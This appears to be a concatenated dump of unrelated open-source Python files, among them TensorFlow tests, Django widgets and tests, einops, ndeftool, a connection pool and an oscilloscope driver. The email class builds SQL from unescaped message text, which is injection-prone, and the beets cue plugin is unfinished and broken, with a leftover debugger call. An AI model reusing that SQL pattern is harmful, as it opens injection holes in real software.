['5', '8', '4', '1'],
])
class RaggedFactoryOpsTest(test_util.TensorFlowTestCase,
parameterized.TestCase):
@parameterized.parameters(
(ragged_int64,),
(ragged_str,),
)
def testRaggedWithMapFn(self, ragged_factory):
@def_function.function
def map_fn_producer(inputs):
return map_fn.map_fn_v2(lambda x: x, inputs)
t = ragged_factory()
result = self.evaluate(map_fn_producer(t))
self.assertAllEqual(t.values, result.values)
@parameterized.parameters(
(ragged_int64,),
(ragged_str,),
)
def testRaggedWithMultiDeviceIterator(self, ragged_factory):
@def_function.function
def dataset_producer(t):
ragged_ds = dataset_ops.Dataset.from_tensor_slices(t).batch(2)
it = multi_device_iterator_ops.MultiDeviceIterator(ragged_ds, ['GPU:0'])
with ops.device_v2('GPU:0'):
return it.get_next_as_optional()
t = ragged_factory()
if t.dtype == dtypes.string:
self.skipTest('b/194439197: fix ragged tensor of string')
result = dataset_producer(t)
self.assertAllEqual(
self.evaluate(t[0]), self.evaluate(result[0].get_value()[0]))
@parameterized.parameters(
(ragged_int64,),
(ragged_str,),
)
def testRaggedWithDistributedDataset(self, ragged_factory):
@def_function.function
def distributed_dataset_producer(t):
strategy = mirrored_strategy.MirroredStrategy(['GPU:0', 'GPU:1'])
ragged_ds = dataset_ops.Dataset.from_tensor_slices(t).batch(2)
dist_dataset = strategy.experimental_distribute_dataset(ragged_ds)
ds = iter(dist_dataset)
return strategy.experimental_local_results(next(ds))[0]
t = ragged_factory()
if t.dtype == dtypes.string:
self.skipTest('b/194439197: fix ragged tensor of string')
result = distributed_dataset_producer(t)
self.assertAllEqual(self.evaluate(t[0]), self.evaluate(result[0]))
@parameterized.parameters(
(dense_str,),
# (ragged_str,), # TODO(b/194439197) fix ragged tensor of string
)
def testIntStringWithDistributedDataset(self, string_factory):
@def_function.function
def distributed_dataset_producer(t):
strategy = mirrored_strategy.MirroredStrategy(['GPU:0', 'GPU:1'])
ragged_ds = dataset_ops.Dataset.from_tensor_slices(t).batch(2)
dist_dataset = strategy.experimental_distribute_dataset(ragged_ds)
ds = iter(dist_dataset)
return strategy.experimental_local_results(next(ds))[0]
ds_dict = {'int': ragged_int64(), 'str': string_factory()}
result = distributed_dataset_producer(ds_dict)
self.assertAllEqual(
self.evaluate(ds_dict['int'][0]), self.evaluate(result['int'][0]))
self.assertAllEqual(
self.evaluate(ds_dict['str'][0]), self.evaluate(result['str'][0]))
if __name__ == '__main__':
test.main()
| tensorflow/tensorflow | tensorflow/python/ops/ragged/ragged_factory_ops_test.py | Python | apache-2.0 | 5,128 |
import psycopg2
import scipy.io
import os
# Set to true if you want to query tables before adding data:
queryConfigs = False
queryTimeSeries = False
# Create a connection to RoboticBicycle database
conn = psycopg2.connect(database="robot_bicycle_parameters", user="hazelnusse")
cur = conn.cursor()
def insert_statement(cur, table, row):
q = cur.mogrify("insert into " + table + " values(%s, %s, %s, %s, %s);", row)
return q
for subdir, dirs, files in os.walk('.'):
i = 0
j = 0
files.sort()
for file in files:
if file.find('RobotRwheelTorsional') != -1:
matdata = scipy.io.loadmat(file)
i += 1
row = (i,
int(matdata['sampleRate'][0][0]),
int(matdata['duration'][0][0]),
matdata['data'].transpose()[0].tolist(),'')
SQL = insert_statement(
cur,
'parametermeasurements.rearwheeltorsionalpendulumtimeseries',
row)
try:
cur.execute(SQL)
conn.commit()
except (psycopg2.IntegrityError, psycopg2.InternalError) as inst:
print("Exception in adding wheel torsional pendulum data:")
print(type(inst))
print(inst)
conn.rollback()
continue
print(cur.statusmessage)
if file.find('RobotRwheelCompound') != -1:
matdata = scipy.io.loadmat(file)
j += 1
row = (j,
int(matdata['sampleRate'][0][0]),
int(matdata['duration'][0][0]),
matdata['data'].transpose()[0].tolist(), '')
SQL = insert_statement(
cur,
'parametermeasurements.rearwheelcompoundpendulumtimeseries',
row)
try:
cur.execute(SQL)
conn.commit()
except (psycopg2.IntegrityError, psycopg2.InternalError) as inst:
print("Exception in adding wheel compound pendulum data:")
print(type(inst))
print(inst)
conn.rollback()
continue
print(cur.statusmessage)
cur.close()
conn.close()
| hazelnusse/robot.bicycle | data/physicalparameters/RawData/PeriodMeasurements/RearWheel/populateTable.py | Python | bsd-2-clause | 2,289 |
store_contents = {
'bagone': ['testsrc/test.tid', 'testsrc/file.css']
}
| tiddlyweb/tiddlywebplugins.ibuilder | testpackage/instance.py | Python | bsd-3-clause | 76 |
from django.conf import settings
from django.contrib.admin.widgets import AdminTextareaWidget
from django.forms.utils import flatatt
from django.forms.widgets import Widget
from django.template.loader import render_to_string
from django.utils.encoding import smart_text
from django.utils.html import escape
from django.utils.safestring import mark_safe
from fluent_contents.models.managers import (
get_parent_active_language_choices,
get_parent_language_code,
)
class PlaceholderFieldWidget(Widget):
"""
The widget to render a :class:`fluent_contents.models.PlaceholderField`.
It outputs a ``<div>`` element which operates as placeholder content area.
The client-side editor will use that area to display the admin interfaces of the :class:`fluent_contents.models.ContentItem` models.
"""
class Media:
js = (
"admin/js/vendor/jquery/jquery{}.js".format(
"" if settings.DEBUG else ".min"
),
"admin/js/jquery.init.js",
"fluent_contents/admin/cp_admin.js",
"fluent_contents/admin/cp_data.js",
"fluent_contents/admin/cp_plugins.js",
)
css = {"screen": ("fluent_contents/admin/cp_admin.css",)}
def __init__(self, attrs=None, slot=None, parent_object=None, plugins=None):
super(PlaceholderFieldWidget, self).__init__(attrs)
self.slot = slot
self._plugins = plugins
self.parent_object = parent_object
def value_from_datadict(self, data, files, name):
# This returns the field value from the form POST fields.
# Currently returns a dummy value, so the PlaceholderFieldDescriptor() can detect it.
return "-DUMMY-"
def render(self, name, value, attrs=None, renderer=None):
"""
Render the placeholder field.
"""
other_instance_languages = None
if value and value != "-DUMMY-":
if get_parent_language_code(self.parent_object):
# Parent is a multilingual object, provide information
# for the copy dialog.
other_instance_languages = get_parent_active_language_choices(
self.parent_object, exclude_current=True
)
context = {
"cp_plugin_list": list(self.plugins),
"placeholder_id": "",
"placeholder_slot": self.slot,
"other_instance_languages": other_instance_languages,
}
return mark_safe(
render_to_string(
"admin/fluent_contents/placeholderfield/widget.html", context
)
)
@property
def plugins(self):
"""
Get the set of plugins that this widget should display.
"""
# Avoid circular reference because __init__.py imports subfolders too
from fluent_contents import extensions
if self._plugins is None:
return extensions.plugin_pool.get_plugins()
else:
return extensions.plugin_pool.get_plugins_by_name(*self._plugins)
class WysiwygWidget(AdminTextareaWidget):
"""
WYSIWYG widget
"""
def __init__(self, attrs=None):
defaults = {"rows": 4}
if attrs:
defaults.update(attrs)
super(WysiwygWidget, self).__init__(attrs)
def render(self, name, value, attrs=None, renderer=None):
value = smart_text(value or u"")
final_attrs = self.build_attrs(attrs) # signature changed in Django 1.11
final_attrs["name"] = name
if "class" in final_attrs:
final_attrs["class"] += " cp-wysiwyg-widget"
else:
final_attrs["class"] = "cp-wysiwyg-widget"
return mark_safe(
u"<textarea{0}>{1}</textarea>".format(flatatt(final_attrs), escape(value))
)
| edoburu/django-fluent-contents | fluent_contents/forms/widgets.py | Python | apache-2.0 | 3,830 |
#coding=utf-8
import time
import threading
class ConnectionPool(object):
def __init__(self, connection_class, args, kwargs=None, max_size=5):
self.connection_class = connection_class
self._args = args
self._kwargs = kwargs
self.max_size = max_size
self._size = 0
self.active_count = 0
# self._mutex = threading.RLock()
self._mutex = threading.Semaphore()
self.conn = []
def _make_connection(self):
# self._mutex.acquire()
if self._kwargs:
conn = self.connection_class(*self._args, **self._kwargs)
else:
conn = self.connection_class(*self._args)
# self.conn.append(conn)
self._size += 1
self.active_count += 1
# self._mutex.release()
return conn
def get(self, retry_times=5):
conn = None
while retry_times:
self._mutex.acquire()
try:
conn = self.conn.pop()
except IndexError as e:
if self.max_size > self._size:
conn = self._make_connection()
else:
break # no slot and reach the limit
finally:
self._mutex.release()
if conn is not None:
break
retry_times -= 1
time.sleep(0.0001)
return conn
def release(self, conn):
if isinstance(conn, self.connection_class):
self._mutex.acquire()
self.conn.append(conn)
self.active_count -= 1
self._mutex.release()
def disconnect(self):
for conn in self.conn:
conn.close()
def decrease(self):
self._mutex.acquire()
self._size -= 1
self.active_count -= 1
self._mutex.release()
def close(self):
self.disconnect()
| seraphlnWu/in_trip | in_trip/in_trip/lib/pool.py | Python | mit | 1,892 |
from __future__ import absolute_import
import re
from django.conf import settings
from django.contrib.auth.models import User
from django.contrib.comments import signals
from django.contrib.comments.models import Comment
from . import CommentTestCase
from ..models import Article, Book
post_redirect_re = re.compile(r'^http://testserver/posted/\?c=(?P<pk>\d+$)')
class CommentViewTests(CommentTestCase):
def testPostCommentHTTPMethods(self):
a = Article.objects.get(pk=1)
data = self.getValidData(a)
response = self.client.get("/post/", data)
self.assertEqual(response.status_code, 405)
self.assertEqual(response["Allow"], "POST")
def testPostCommentMissingCtype(self):
a = Article.objects.get(pk=1)
data = self.getValidData(a)
del data["content_type"]
response = self.client.post("/post/", data)
self.assertEqual(response.status_code, 400)
def testPostCommentBadCtype(self):
a = Article.objects.get(pk=1)
data = self.getValidData(a)
data["content_type"] = "Nobody expects the Spanish Inquisition!"
response = self.client.post("/post/", data)
self.assertEqual(response.status_code, 400)
def testPostCommentMissingObjectPK(self):
a = Article.objects.get(pk=1)
data = self.getValidData(a)
del data["object_pk"]
response = self.client.post("/post/", data)
self.assertEqual(response.status_code, 400)
def testPostCommentBadObjectPK(self):
a = Article.objects.get(pk=1)
data = self.getValidData(a)
data["object_pk"] = "14"
response = self.client.post("/post/", data)
self.assertEqual(response.status_code, 400)
def testPostInvalidIntegerPK(self):
a = Article.objects.get(pk=1)
data = self.getValidData(a)
data["comment"] = "This is another comment"
data["object_pk"] = u'\ufffd'
response = self.client.post("/post/", data)
self.assertEqual(response.status_code, 400)
def testPostInvalidDecimalPK(self):
b = Book.objects.get(pk='12.34')
data = self.getValidData(b)
data["comment"] = "This is another comment"
data["object_pk"] = 'cookies'
response = self.client.post("/post/", data)
self.assertEqual(response.status_code, 400)
def testCommentPreview(self):
a = Article.objects.get(pk=1)
data = self.getValidData(a)
data["preview"] = "Preview"
response = self.client.post("/post/", data)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, "comments/preview.html")
def testHashTampering(self):
a = Article.objects.get(pk=1)
data = self.getValidData(a)
data["security_hash"] = "Nobody expects the Spanish Inquisition!"
response = self.client.post("/post/", data)
self.assertEqual(response.status_code, 400)
def testDebugCommentErrors(self):
"""The debug error template should be shown only if DEBUG is True"""
olddebug = settings.DEBUG
settings.DEBUG = True
a = Article.objects.get(pk=1)
data = self.getValidData(a)
data["security_hash"] = "Nobody expects the Spanish Inquisition!"
response = self.client.post("/post/", data)
self.assertEqual(response.status_code, 400)
self.assertTemplateUsed(response, "comments/400-debug.html")
settings.DEBUG = False
response = self.client.post("/post/", data)
self.assertEqual(response.status_code, 400)
self.assertTemplateNotUsed(response, "comments/400-debug.html")
settings.DEBUG = olddebug
def testCreateValidComment(self):
a = Article.objects.get(pk=1)
data = self.getValidData(a)
self.response = self.client.post("/post/", data, REMOTE_ADDR="1.2.3.4")
self.assertEqual(self.response.status_code, 302)
self.assertEqual(Comment.objects.count(), 1)
c = Comment.objects.all()[0]
self.assertEqual(c.ip_address, "1.2.3.4")
self.assertEqual(c.comment, "This is my comment")
def testPostAsAuthenticatedUser(self):
a = Article.objects.get(pk=1)
data = self.getValidData(a)
data['name'] = data['email'] = ''
self.client.login(username="normaluser", password="normaluser")
self.response = self.client.post("/post/", data, REMOTE_ADDR="1.2.3.4")
self.assertEqual(self.response.status_code, 302)
self.assertEqual(Comment.objects.count(), 1)
c = Comment.objects.all()[0]
self.assertEqual(c.ip_address, "1.2.3.4")
u = User.objects.get(username='normaluser')
self.assertEqual(c.user, u)
self.assertEqual(c.user_name, u.get_full_name())
self.assertEqual(c.user_email, u.email)
def testPostAsAuthenticatedUserWithoutFullname(self):
"""
Check that the user's name in the comment is populated for
authenticated users without first_name and last_name.
"""
user = User.objects.create_user(username='jane_other',
email='jane@example.com', password='jane_other')
a = Article.objects.get(pk=1)
data = self.getValidData(a)
data['name'] = data['email'] = ''
self.client.login(username="jane_other", password="jane_other")
self.response = self.client.post("/post/", data, REMOTE_ADDR="1.2.3.4")
c = Comment.objects.get(user=user)
self.assertEqual(c.ip_address, "1.2.3.4")
self.assertEqual(c.user_name, 'jane_other')
user.delete()
def testPreventDuplicateComments(self):
"""Prevent posting the exact same comment twice"""
a = Article.objects.get(pk=1)
data = self.getValidData(a)
self.client.post("/post/", data)
self.client.post("/post/", data)
self.assertEqual(Comment.objects.count(), 1)
# This should not trigger the duplicate prevention
self.client.post("/post/", dict(data, comment="My second comment."))
self.assertEqual(Comment.objects.count(), 2)
def testCommentSignals(self):
"""Test signals emitted by the comment posting view"""
# callback
def receive(sender, **kwargs):
self.assertEqual(kwargs['comment'].comment, "This is my comment")
self.assertTrue('request' in kwargs)
received_signals.append(kwargs.get('signal'))
# Connect signals and keep track of handled ones
received_signals = []
expected_signals = [
signals.comment_will_be_posted, signals.comment_was_posted
]
for signal in expected_signals:
signal.connect(receive)
# Post a comment and check the signals
self.testCreateValidComment()
self.assertEqual(received_signals, expected_signals)
for signal in expected_signals:
signal.disconnect(receive)
def testWillBePostedSignal(self):
"""
Test that the comment_will_be_posted signal can prevent the comment from
actually getting saved
"""
def receive(sender, **kwargs): return False
signals.comment_will_be_posted.connect(receive, dispatch_uid="comment-test")
a = Article.objects.get(pk=1)
data = self.getValidData(a)
response = self.client.post("/post/", data)
self.assertEqual(response.status_code, 400)
self.assertEqual(Comment.objects.count(), 0)
signals.comment_will_be_posted.disconnect(dispatch_uid="comment-test")
def testWillBePostedSignalModifyComment(self):
"""
Test that the comment_will_be_posted signal can modify a comment before
it gets posted
"""
def receive(sender, **kwargs):
# a bad but effective spam filter :)...
kwargs['comment'].is_public = False
signals.comment_will_be_posted.connect(receive)
self.testCreateValidComment()
c = Comment.objects.all()[0]
self.assertFalse(c.is_public)
def testCommentNext(self):
"""Test the different "next" actions the comment view can take"""
a = Article.objects.get(pk=1)
data = self.getValidData(a)
response = self.client.post("/post/", data)
location = response["Location"]
match = post_redirect_re.match(location)
self.assertTrue(match != None, "Unexpected redirect location: %s" % location)
data["next"] = "/somewhere/else/"
data["comment"] = "This is another comment"
response = self.client.post("/post/", data)
location = response["Location"]
match = re.search(r"^http://testserver/somewhere/else/\?c=\d+$", location)
self.assertTrue(match != None, "Unexpected redirect location: %s" % location)
def testCommentDoneView(self):
a = Article.objects.get(pk=1)
data = self.getValidData(a)
response = self.client.post("/post/", data)
location = response["Location"]
match = post_redirect_re.match(location)
self.assertTrue(match != None, "Unexpected redirect location: %s" % location)
pk = int(match.group('pk'))
response = self.client.get(location)
self.assertTemplateUsed(response, "comments/posted.html")
self.assertEqual(response.context[0]["comment"], Comment.objects.get(pk=pk))
def testCommentNextWithQueryString(self):
"""
The `next` key needs to handle already having a query string (#10585)
"""
a = Article.objects.get(pk=1)
data = self.getValidData(a)
data["next"] = "/somewhere/else/?foo=bar"
data["comment"] = "This is another comment"
response = self.client.post("/post/", data)
location = response["Location"]
match = re.search(r"^http://testserver/somewhere/else/\?foo=bar&c=\d+$", location)
self.assertTrue(match != None, "Unexpected redirect location: %s" % location)
def testCommentPostRedirectWithInvalidIntegerPK(self):
"""
Tests that attempting to retrieve the location specified in the
post redirect, after adding some invalid data to the expected
querystring it ends with, doesn't cause a server error.
"""
a = Article.objects.get(pk=1)
data = self.getValidData(a)
data["comment"] = "This is another comment"
response = self.client.post("/post/", data)
location = response["Location"]
broken_location = location + u"\ufffd"
response = self.client.get(broken_location)
self.assertEqual(response.status_code, 200)
def testCommentNextWithQueryStringAndAnchor(self):
"""
The `next` key needs to handle already having an anchor. Refs #13411.
"""
# With a query string also.
a = Article.objects.get(pk=1)
data = self.getValidData(a)
data["next"] = "/somewhere/else/?foo=bar#baz"
data["comment"] = "This is another comment"
response = self.client.post("/post/", data)
location = response["Location"]
match = re.search(r"^http://testserver/somewhere/else/\?foo=bar&c=\d+#baz$", location)
self.assertTrue(match != None, "Unexpected redirect location: %s" % location)
# Without a query string
a = Article.objects.get(pk=1)
data = self.getValidData(a)
data["next"] = "/somewhere/else/#baz"
data["comment"] = "This is another comment"
response = self.client.post("/post/", data)
location = response["Location"]
match = re.search(r"^http://testserver/somewhere/else/\?c=\d+#baz$", location)
self.assertTrue(match != None, "Unexpected redirect location: %s" % location)
| lisael/pg-django | tests/regressiontests/comment_tests/tests/comment_view_tests.py | Python | bsd-3-clause | 11,790 |
# -*- coding: utf-8 -*-
# Copyright 2016 Bruno Cauet
# Split an album-file in tracks thanks a cue file
from __future__ import division, absolute_import, print_function
import subprocess
from os import path
from glob import glob
from beets.util import command_output, displayable_path
from beets.plugins import BeetsPlugin
from beets.autotag import TrackInfo
class CuePlugin(BeetsPlugin):
def __init__(self):
super(CuePlugin, self).__init__()
# this does not seem supported by shnsplit
self.config.add({
'keep_before': .1,
'keep_after': .9,
})
# self.register_listener('import_task_start', self.look_for_cues)
def candidates(self, items, artist, album, va_likely):
import pdb
pdb.set_trace()
def item_candidates(self, item, artist, album):
dir = path.dirname(item.path)
cues = glob.glob(path.join(dir, "*.cue"))
if not cues:
return
if len(cues) > 1:
self._log.info(u"Found multiple cue files doing nothing: {0}",
list(map(displayable_path, cues)))
cue_file = cues[0]
self._log.info("Found {} for {}", displayable_path(cue_file), item)
try:
# careful: will ask for input in case of conflicts
command_output(['shnsplit', '-f', cue_file, item.path])
except (subprocess.CalledProcessError, OSError):
self._log.exception(u'shnsplit execution failed')
return
tracks = glob(path.join(dir, "*.wav"))
self._log.info("Generated {0} tracks", len(tracks))
for t in tracks:
title = "dunno lol"
track_id = "wtf"
index = int(path.basename(t)[len("split-track"):-len(".wav")])
yield TrackInfo(title, track_id, index=index, artist=artist)
# generate TrackInfo instances
| clinton-hall/nzbToMedia | libs/common/beetsplug/cue.py | Python | gpl-3.0 | 1,898 |
import hashlib
import sys
import datetime
class EmailObject:
def __init__(self, sender, date, subject, body):
self.sender = sender
self.date = datetime.datetime.strptime(date[5:25], '%d %b %Y %H:%M:%S') #TODO: FIX THIS CODE TO BE MORE ROBUST
self.body = body
self.subject = subject
self.emailId = self.createEmailId()
def createEmailId(self):
hasher = hashlib.md5()
hasher.update(self.sender.encode() + self.date.strftime('%Y-%m-%d %H:%M:%S').encode() + self.subject.encode())
hasher.update(self.body.encode())
result = int(hasher.hexdigest(), 16) % sys.maxsize
return result
def fetchEmailMain(self):
sqlLine = "('" + self.sender + "','" + self.date.strftime('%Y-%m-%d %H:%M:%S') + "','" + self.subject + "'," + str(self.emailId) + ")"
return sqlLine
def fetchEmailBodySql(self):
sqlLine = "(" + str(self.emailId) + ",'" + self.body + "')"
return sqlLine
def __str__(self):
descriptivestr = "Sender: " + "'" + self.sender + "'" + "\n"
descriptivestr += "Date: " + "'" + self.date.strftime('%Y-%m-%d %H:%M:%S') +"'" +"\n"
descriptivestr += "Subject: " + "'" + self.subject + "'" + "\n"
descriptivestr += "Body: " + self.body + "\n"
return descriptivestr
| liamneath1/SUMOWaferBackend | PythonBackend/EmailObject.py | Python | mit | 1,333 |
"""
Specialization of einops for torch.
Unfortunately, torch's jit scripting mechanism isn't strong enough,
and to have scripting supported at least for layers,
a number of changes is required, and this layer helps.
Importantly, whole lib is designed so that you can't use it
"""
from typing import Dict, List
import torch
from einops.einops import TransformRecipe, _reconstruct_from_shape_uncached
class TorchJitBackend:
"""
Completely static backend that mimics part of normal backend functionality
but restricted to torch stuff only
"""
@staticmethod
def reduce(x: torch.Tensor, operation: str, reduced_axes: List[int]):
if operation == 'min':
return x.amin(dim=reduced_axes)
elif operation == 'max':
return x.amax(dim=reduced_axes)
elif operation == 'sum':
return x.sum(dim=reduced_axes)
elif operation == 'mean':
return x.mean(dim=reduced_axes)
elif operation == 'prod':
for i in list(sorted(reduced_axes))[::-1]:
x = x.prod(dim=i)
return x
else:
raise NotImplementedError('Unknown reduction ', operation)
@staticmethod
def transpose(x, axes: List[int]):
return x.permute(axes)
@staticmethod
def stack_on_zeroth_dimension(tensors: List[torch.Tensor]):
return torch.stack(tensors)
@staticmethod
def tile(x, repeats: List[int]):
return x.repeat(repeats)
@staticmethod
def add_axes(x, n_axes: int, pos2len: Dict[int, int]):
repeats = [-1] * n_axes
for axis_position, axis_length in pos2len.items():
x = torch.unsqueeze(x, axis_position)
repeats[axis_position] = axis_length
return x.expand(repeats)
@staticmethod
def is_float_type(x):
return x.dtype in [torch.float16, torch.float32, torch.float64]
@staticmethod
def shape(x):
return x.shape
@staticmethod
def reshape(x, shape: List[int]):
return x.reshape(shape)
# mirrors einops.einops._apply_recipe
def apply_for_scriptable_torch(recipe: TransformRecipe, tensor: torch.Tensor, reduction_type: str) -> torch.Tensor:
backend = TorchJitBackend
init_shapes, reduced_axes, axes_reordering, added_axes, final_shapes = \
_reconstruct_from_shape_uncached(recipe, backend.shape(tensor))
tensor = backend.reshape(tensor, init_shapes)
if len(reduced_axes) > 0:
tensor = backend.reduce(tensor, operation=reduction_type, reduced_axes=reduced_axes)
tensor = backend.transpose(tensor, axes_reordering)
if len(added_axes) > 0:
tensor = backend.add_axes(tensor, n_axes=len(axes_reordering) + len(added_axes), pos2len=added_axes)
return backend.reshape(tensor, final_shapes)
| arogozhnikov/einops | einops/_torch_specific.py | Python | mit | 2,804 |
# -*- coding: utf-8 -*-
from functools import wraps
import os.path
import click
import ndef
version_message = '%%(prog)s %%(version)s (ndeflib %s)' % ndef.__version__
command_plugins = os.path.join(os.path.dirname(__file__), 'commands')
def echo(*args, **kwargs):
click.echo(*args, **kwargs)
def info(*args):
if click.get_current_context().meta['output-logmsg'] != 'silent':
click.secho(*args, err=True, fg='green')
def dmsg(*args):
if click.get_current_context().meta['output-logmsg'] == 'debug':
click.secho(*args, err=True, fg='yellow')
def warn(*args):
click.secho(*args, err=True, fg='red')
class CommandGroup(click.Group):
def list_commands(self, ctx):
command_list = []
# All commands are separate Python files within the
# command_plugins folder.
for filename in sorted(os.listdir(command_plugins)):
basename, extension = os.path.splitext(filename)
if extension == '.py' and basename != '__init__':
command_list.append(basename)
return command_list
def get_command(self, ctx, name):
name = name.lower() # all commands treated case insensitive
# From list_commands() we get the command file names without
# extension. We use the upper case letters to construct the
# abbreviated name and import the module if the requested
# command name matches either the lower case full or short
# name.
for cmd_name in self.list_commands(ctx):
cmd_abbr = ''.join(x for x in cmd_name if 'A' <= x <= 'Z')
if name in (cmd_name.lower(), cmd_abbr.lower()):
module = 'ndeftool.commands.' + cmd_name
return __import__(module, None, None, ['cmd']).cmd
def format_commands(self, ctx, formatter):
rows = []
# From list_commands() we get the command file names without
# extension. We use the upper case letters to construct the
# abbreviated name and store lower case versions of short and
# long command name.
for cmd_name in self.list_commands(ctx):
cmd_abbr = ''.join(x for x in cmd_name if 'A' <= x <= 'Z')
cmd_help = self.get_command(ctx, cmd_name).short_help or ''
rows.append((cmd_abbr.lower(), cmd_name.lower(), cmd_help))
# We want the command list to be sorted by abbreviated command
# name with the shortest names first.
rows = sorted(rows, key=lambda x: '%02d %s' % (len(x[0]), x[0]))
rows = [('%s, %s' % (a, n) if a != n else a, h) for a, n, h in rows]
with formatter.section('Commands'):
formatter.write_dl(rows)
@click.command(cls=CommandGroup, chain=True)
@click.version_option(message=version_message)
@click.option('--relax', 'errors', flag_value='relax',
help='Ignore some errors when decoding.')
@click.option('--ignore', 'errors', flag_value='ignore',
help='Ignore all errors when decoding.')
@click.option('--silent', 'logmsg', flag_value='silent',
help='Suppress all progress information.')
@click.option('--debug', 'logmsg', flag_value='debug',
help='Output debug progress information.')
@click.pass_context
def main(ctx, **kwargs):
"""Create or inspect NFC Data Exchange Format messages.
The ndeftool provides a number of commands to create or inspect
NDEF messages. All commands can be chained to an internal
processing pipeline and the whole fit into a command shell
pipeline.
\b
ndeftool load FILE1 load FILE2 save FILE3
ndeftool load - load FILE2 < FILE1 > FILE3
cat FILE1 | ndeftool load - load FILE2 | hexdump -Cv
The ndeftool processing pipeline builds an NDEF message from left
to right, each command adds some NDEF record(s) to the message
until it is either send to standard output or consumed by an
ndeftool command (unless the --keep option is given to a command
that would otherwise consume the message).
\b
ndeftool text 'one' text 'two' print --keep > two_text_records.ndef
ndeftool text 'one' text 'two' save --keep two_text_records.ndef print
A new pipeline is started after ndeftool command that consumed the
current message. This can be used to generate or inspect multiple
messages.
\b
ndeftool text 'one' save text_1.ndef text 'two' save text_2.ndef
ndeftool load text_1.ndef print load text_2.ndef print
Each command has it's own help page: 'ndeftool <cmd> --help'
"""
ctx.meta['decode-errors'] = kwargs['errors'] or 'strict'
ctx.meta['output-logmsg'] = kwargs['logmsg'] or 'normal'
@main.resultcallback()
def process_commands(processors, **kwargs):
message = None
for processor in processors:
message = processor(message)
dmsg('records = ' + str(message))
echo(b''.join(ndef.message_encoder(message)), nl=False)
def command_processor(func):
@wraps(func)
def wrapper(*args, **kwargs):
def processor(message):
return func(message, *args, **kwargs)
return processor
return wrapper
| nfcpy/ndeftool | src/ndeftool/cli.py | Python | isc | 5,162 |
"""
Python Interchangeable Virtual Instrument Library
Copyright (c) 2012-2016 Alex Forencich
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
from .agilent2000A import *
import numpy as np
import struct
from .. import ivi
from .. import fgen
OutputMode = set(['function', 'arbitrary'])
StandardWaveformMapping = {
'sine': 'sin',
'square': 'squ',
#'triangle': 'tri',
'ramp_up': 'ramp',
#'ramp_down',
#'dc'
'pulse': 'puls',
'noise': 'nois',
'dc': 'dc',
'sinc': 'sinc',
'exprise': 'expr',
'expfall': 'expf',
'cardiac': 'card',
'gaussian': 'gaus'
}
class agilent3000A(agilent2000A, fgen.ArbWfm, fgen.ArbFrequency,
fgen.ArbChannelWfm):
"Agilent InfiniiVision 3000A series IVI oscilloscope driver"
def __init__(self, *args, **kwargs):
self.__dict__.setdefault('_instrument_id', '')
super(agilent3000A, self).__init__(*args, **kwargs)
self._analog_channel_name = list()
self._analog_channel_count = 4
self._digital_channel_name = list()
self._digital_channel_count = 16
self._channel_count = self._analog_channel_count + self._digital_channel_count
self._bandwidth = 1e9
self._horizontal_divisions = 10
self._vertical_divisions = 8
# wavegen option
self._output_count = 1
self._output_standard_waveform_mapping = StandardWaveformMapping
self._output_mode_list = OutputMode
self._arbitrary_sample_rate = 0
self._arbitrary_waveform_number_waveforms_max = 0
self._arbitrary_waveform_size_max = 8192
self._arbitrary_waveform_size_min = 2
self._arbitrary_waveform_quantum = 1
self._identity_description = "Agilent InfiniiVision 3000A X-series IVI oscilloscope driver"
self._identity_supported_instrument_models = ['DSOX3012A','DSOX3014A','DSOX3024A',
'DSOX3032A','DSOX3034A','DSOX3052A','DSOX3054A','DSOX3104A','MSOX3012A','MSOX3014A',
'MSOX3024A','MSOX3032A','MSOX3034A','MSOX3052A','MSOX3054A','MSOX3104A']
self._init_outputs()
self._init_channels()
def _get_output_arbitrary_gain(self, index):
index = ivi.get_index(self._output_name, index)
return self._output_arbitrary_gain[index]
def _set_output_arbitrary_gain(self, index, value):
index = ivi.get_index(self._output_name, index)
value = float(value)
self._output_arbitrary_gain[index] = value
def _get_output_arbitrary_offset(self, index):
index = ivi.get_index(self._output_name, index)
return self._output_arbitrary_offset[index]
def _set_output_arbitrary_offset(self, index, value):
index = ivi.get_index(self._output_name, index)
value = float(value)
self._output_arbitrary_offset[index] = value
def _get_output_arbitrary_waveform(self, index):
index = ivi.get_index(self._output_name, index)
return self._output_arbitrary_waveform[index]
def _set_output_arbitrary_waveform(self, index, value):
index = ivi.get_index(self._output_name, index)
value = str(value)
self._output_arbitrary_waveform[index] = value
def _get_arbitrary_sample_rate(self):
return self._arbitrary_sample_rate
def _set_arbitrary_sample_rate(self, value):
value = float(value)
self._arbitrary_sample_rate = value
def _get_arbitrary_waveform_number_waveforms_max(self):
return self._arbitrary_waveform_number_waveforms_max
def _get_arbitrary_waveform_size_max(self):
return self._arbitrary_waveform_size_max
def _get_arbitrary_waveform_size_min(self):
return self._arbitrary_waveform_size_min
def _get_arbitrary_waveform_quantum(self):
return self._arbitrary_waveform_quantum
def _arbitrary_waveform_clear(self, handle):
pass
def _arbitrary_waveform_configure(self, index, handle, gain, offset):
self._set_output_arbitrary_waveform(index, handle)
self._set_output_arbitrary_gain(index, gain)
self._set_output_arbitrary_offset(index, offset)
def _arbitrary_waveform_create(self, data):
return "handle"
def _get_output_arbitrary_frequency(self, index):
index = ivi.get_index(self._output_name, index)
return self._output_arbitrary_frequency[index]
def _set_output_arbitrary_frequency(self, index, value):
index = ivi.get_index(self._output_name, index)
value = float(value)
self._output_arbitrary_frequency[index] = value
def _arbitrary_waveform_create_channel_waveform(self, index, data):
y = None
x = None
if type(data) == list and type(data[0]) == float:
# list
y = array(data)
elif type(data) == np.ndarray and len(data.shape) == 1:
# 1D array
y = data
